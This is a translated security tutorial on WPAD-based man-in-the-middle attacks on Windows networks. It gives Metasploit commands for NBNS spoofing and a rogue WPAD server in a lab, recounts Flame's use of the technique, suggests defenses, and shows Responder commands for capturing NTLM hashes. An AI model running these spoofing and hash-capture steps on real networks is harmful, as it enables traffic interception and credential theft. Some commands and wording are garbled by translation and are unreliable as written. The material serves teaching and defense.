WPAD-based man-in-the-middle attack

WPAD-based man-in-the-middle attack

0x00 Preface

Windows Name Parsing Mechanism Research and defect utilization (http://www.bkjia.com/Article/201512/452217.html) is very inspired, so the actual use of further research, found that WPAD-based man-in-the-middle attack is very interesting, now we will share with you the results.

0x01 Introduction

WPAD:

The Web Proxy Autodiscovery Protocol allows the browser to automatically discover the Proxy server, locate the Proxy configuration file, download, compile, and run the file, and then use the Proxy to access the network automatically.

PAC:

The Proxy Auto-Config file defines how browsers and other user proxies automatically select an appropriate Proxy server to access a URL.

To use PAC, we should publish a PAC file on a Web server, in addition, enter the URL of the PAC file on the proxy link setting page of the browser or notify the user agent to use the file through the WPAD protocol.

WPAD. dat is used for wpad. Examples of PAC files:

function FindProxyForURL(url, host) {   if (url== 'http://www.baidu.com/') return 'DIRECT';   if (host== 'twitter.com') return 'SOCKS 127.0.0.10:7070';   if (dnsResolve(host) == '10.0.0.100') return 'PROXY 127.0.0.1:8086;DIRECT';   return 'DIRECT';}

0x02 WPAD principles

When you access a webpage, the user first queries the location of the PAC file. The specific method is as follows:

1. Use a DHCP server

The web browser sends dhcp inform to the DHCP server to query the location of the PAC file.

The DHCP server returns a dhcp ack packet containing the location of the PAC file.

2. query through DNS

The web browser initiates WPAD + X queries to the DNS server

The DNS server returns the IP address of the WPAD host.

The web browser downloads wpad. dat through port 80 of the IP address.

3. query through NBNS

Tips:

Windows 2 K, XP, and 2K3 only support DNS and NetBIOS

After Windows Vista (including 2K8, Win7, Win8.x, and Win 10), DNS, NBNS, and LLMNR are supported.

If neither DHCP nor DNS server responds and the requested host name does not exist in the current cache, the following name resolution will be initiated:

If the current system supports LLMNR (Link-Local Multicast Name Resolution), broadcast LLMNR queries are initiated first. If no response is returned, broadcast NBNS queries are initiated again.

If a host responds to the PAC File Location

The web browser downloads wpad. dat through port 80 of the IP address.

0x03 WPAD Vulnerability

Based on the WPAD principles, it is not difficult to find vulnerabilities in the WPAD,

If the attacker spoofs the NBNS Response when initiating an NBNS query, the attacker can control the attacker to access the Internet through the forged proxy server to hijack the session.

0x04 WPAD vulnerability Test

Test environment:

Attacked User: win7 x86192.168.16.191 attacked User: kali linux192.168.16.245

Test process:

1. Listen for NBNS queries

use auxiliary/spoof/nbns/nbns_responseset regex WPADset spoofip 192.168.16.245run

2. Set the WPAD Server

use auxiliary/server/wpadset proxy 192.168.16.245run

3. The attacked user initiates a query

Construct a broadcast NBNS query

The PAC file location that the current dbcp and dns server cannot provide

4. Respond to broadcast NBNS queries of attacked users

Attack host response broadcast NBNS query and specify the location of the PAC File

The attacked host accesses the specified PAC location for download.

Wireshark packet capture

Broadcast NBNS query package,

NBNS query response package,

The location where the attacked host requests the PAC file,

The attacker replies to the PAC file,

Tips:

In a virtual machine environment, wireshark is used to only capture local data packets. You need to cancel the hybrid mode.

5. Attackers use forged proxy configurations to access the Internet.

The attacker's data packets can be captured on a forged proxy. Man-in-the-middle attacks are successful.

0x05 practical use of WPAD

How powerful is WPAD-based man-in-the-middle attacks? The supercomputer virus Flame gives us a good demonstration.

The working mode is as follows:

1. SNACK: NBNS spoofing

Listen to the current network. If the received NBNS query contains WPAD characters, immediately forge the NBNS Response

2. MUNCH: Spoofing proxy detection and Windows Update request

Provides the WPAD service to change the WPAD settings of the attacked host.

After being successfully used as a proxy for the attacked host, it will hijack a specific Windows Update request and provide a windows Update file with a backdoor for users to download.

Update the windows request package captured in the test environment

Packet captured by Burp suite:

Flame finally successfully implemented a man-in-the-middle attack based on WPAD, tampered with windows to update data, and finally infected other hosts on the Intranet.

0x06 Protection

You can disable the WPAD application by setting the following settings to avoid this attack:

Internet Explorer-Internet Options-Connections-LAN settings

Deselect Automatically detect settings

If you have been attacked by the NBNS man-in-the-middle, you can check the netbios cache.

nbtstat -c

0x07 supplement

Responder:

Responder is a LLMNR, NBT-NS and MDNS extends oner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, extended Security NTLMSSP and Basic HTTP authentication.

Responder can be said to be an intranet man-in-the-middle attack, which is worth trying.

The following is a simple command:

git clone https://github.com/SpiderLabs/Responder.gitcd Responder/python Responder.py -I eth0 -i 192.168.16.245 -b

When the attacked host accesses the host sharing, it can capture its hash,

0x08 Summary

Although WPAD is not a very new technology, it does not know much about it, so it should be paid attention to in Intranet penetration.